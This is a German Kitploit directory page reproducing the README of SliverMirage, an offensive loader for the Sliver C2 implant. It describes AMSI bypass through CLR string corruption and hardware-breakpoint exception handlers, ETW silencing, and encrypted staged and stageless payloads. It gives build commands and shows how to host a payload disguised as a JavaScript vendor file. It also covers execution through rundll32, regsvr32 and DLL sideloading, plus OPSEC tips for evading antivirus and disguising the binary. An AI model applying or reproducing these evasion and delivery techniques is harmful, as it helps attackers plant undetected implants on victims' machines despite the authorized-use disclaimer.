Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SliverMirage — Crystal Palace PICO Loader für Sliver C2 Dual-Layer-AMSI-Bypass, ETW-Silencing, mit AES-256-CBC verschlüsselte Payloads, 6 Zustellungsvarianten | Kitploit
Tools/GitHubGitHub/daniomass/slivermirage
ExploitationPost-ExploitationMalware-AnalyseCommand and ControlBinäranalyseRed TeamingPayload-Entwicklung
GitHubdaniomass/slivermirage

SliverMirage

Crystal Palace PICO Loader für Sliver C2 Dual-Layer-AMSI-Bypass, ETW-Silencing, mit AES-256-CBC verschlüsselte Payloads, 6 Zustellungsvarianten

Repository anzeigen
154vor 5 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SliverMirage

Ein Fork von CrystalSliver, der den Crystal Palace PICO-Loader um einen zweischichtigen AMSI-Bypass, ETW-Silencing und sechs Auslieferungsvarianten für Sliver C2 erweitert.

Was es tut

SliverMirage verpackt eine Sliver-Implant-DLL über die PICO-Virtualisierung von Crystal Palace und liefert sie über einen Loader aus, der AMSI und ETW umgeht, ohne amsi.dll oder ntdll.dll zu patchen.

Evasion-Stack:

EbeneTechnikDetail
AMSI L1CLR-String-KorruptionLdrRegisterDllNotification fängt das Laden von clr.dll ab, korrumpiert AmsiScanBuffer in .rdata, bevor die CLR GetProcAddress aufruft
AMSI L2VEH + HWBPVectored-Exception-Handler auf AmsiScanBuffer gibt E_INVALIDARG zurück
ETWHWBPDR1 auf NtTraceControl, gibt STATUS_SUCCESS zurück
PayloadAES-256-CBC + XORBCrypt-Entschlüsselung, VirtualAlloc(RW) -> VirtualProtect(RX), kein RWX
VirtualisierungCrystal Palace PICODie Sliver-DLL läuft in einem PICO-Prozess, unsichtbar für AV im Userland

Varianten

FormatDateiAuslieferungC2 zur Laufzeit?
exeStaged EXEEXE + payload.dat auf der C2-WebsiteJa (HTTPS)
exe-stagelessStageless EXENur EXENein
dllStageless DLLNur DLLNein
dll-stagedStaged DLLDLL + payload.dat auf der C2-WebsiteJa (HTTPS)
shellcodeStaged Shellcode.bin + payload.datJa (HTTPS)
shellcode-stagelessStageless ShellcodeNur .binNein

Staged-Varianten laden das verschlüsselte PICO zur Laufzeit von einer Sliver-HTTPS-Website herunter. Die EXE/DLL ist klein (~20 KB) und trägt keinen Payload auf der Festplatte.

Stageless-Varianten betten das verschlüsselte PICO zur Kompilierzeit ein (XOR + AES-Doppelschicht). Größer auf der Festplatte, aber keinerlei Netzwerkaktivität vor dem Beacon-Callback.

Schnellstart

Voraussetzungen

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 mit pefile (pip install pefile)
  • openssl
  • Java 17 (für Crystal Palace — wird von build.sh automatisch bereitgestellt)

Build mit build.sh (empfohlen)

Das Build-Skript stellt fehlende Abhängigkeiten automatisch bereit (einschließlich Crystal Palace und Java 17) und übernimmt die gesamte Pipeline: DLL -> Crystal Palace PICO -> verschlüsseln -> kompilieren.

root@kitploit:~
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

Optionen:

  • --dll <path> — Sliver-Implant-DLL (erforderlich)
  • --host <ip> — C2-Server-IP (erforderlich für Staged-Formate)
  • --port <port> — C2-Port (Standard: 443)
  • --path <path> — URL-Pfad für den Payload-Download (Standard: /assets/js/vendor.js)
  • --format <fmt> — Ausgabeformat (Standard: exe)
  • --export <name> — Benutzerdefinierter DLL-Exportname

Build mit Make (manuell)

Falls du bereits einen Crystal Palace PICO-Blob hast:

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# All targets
make clean

Bereitstellung

Staged (EXE oder DLL)

  1. Lade build/payload.dat auf eine Sliver-HTTPS-Website hoch:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. Liefere build/csvchelper.exe (oder .dll) an das Ziel aus.

Stageless

Einzeldatei-Auslieferung. Keine Einrichtung einer C2-Website erforderlich.

DLL-Ausführungsmethoden

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

Oder nutze DLL-Sideloading (benenne die Datei so um, dass sie einer legitimen DLL entspricht, die die Zielanwendung lädt).

Exporte: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

Projektstruktur

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

OPSEC-Hinweise

  • IAT ist sauber: nur kernel32, advapi32, bcrypt — alles legitime Windows-APIs
  • Keine Speicher-Patches: Der AMSI/ETW-Bypass verwendet Hardware-Breakpoints, kein VirtualProtect auf System-DLLs
  • Kein RWX: Payload-Speicher wechselt von RW -> RX, nie RWX
  • GUI-Subsystem: WinMain-Einstiegspunkt, -mwindows — kein kurzes Aufblitzen der Konsole
  • Versionsinfo + Manifest: Das eingebettete asInvoker-Manifest unterdrückt UAC-Heuristiken
  • Entropiekontrolle: Stageless-Payloads verwenden einen rollierenden XOR-Schlüssel, um die Entropie von ~7,8 auf ~6,0-6,5 zu senken
  • Passe resource.rc / resource_dll.rc vor dem Build mit deiner Tarnidentität an

Haftungsausschluss

Dieses Projekt ist ausschließlich für autorisierte Sicherheitstests, Forschung und Bildungszwecke bestimmt. Verwende es ausschließlich in Umgebungen, in denen du eine ausdrückliche schriftliche Genehmigung zur Durchführung von Penetrationstests besitzt. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch dieser Software.

Credits

  • Crystal Palace von Rasta Mouse — PICO-Virtualisierungs-Engine
  • CrystalSliver — ursprüngliche Integration von Crystal Palace + Sliver
  • sRDI von Nick Landers — Technik der Shellcode-Reflective-DLL-Injection

Lizenz

MIT

Tool herunterladen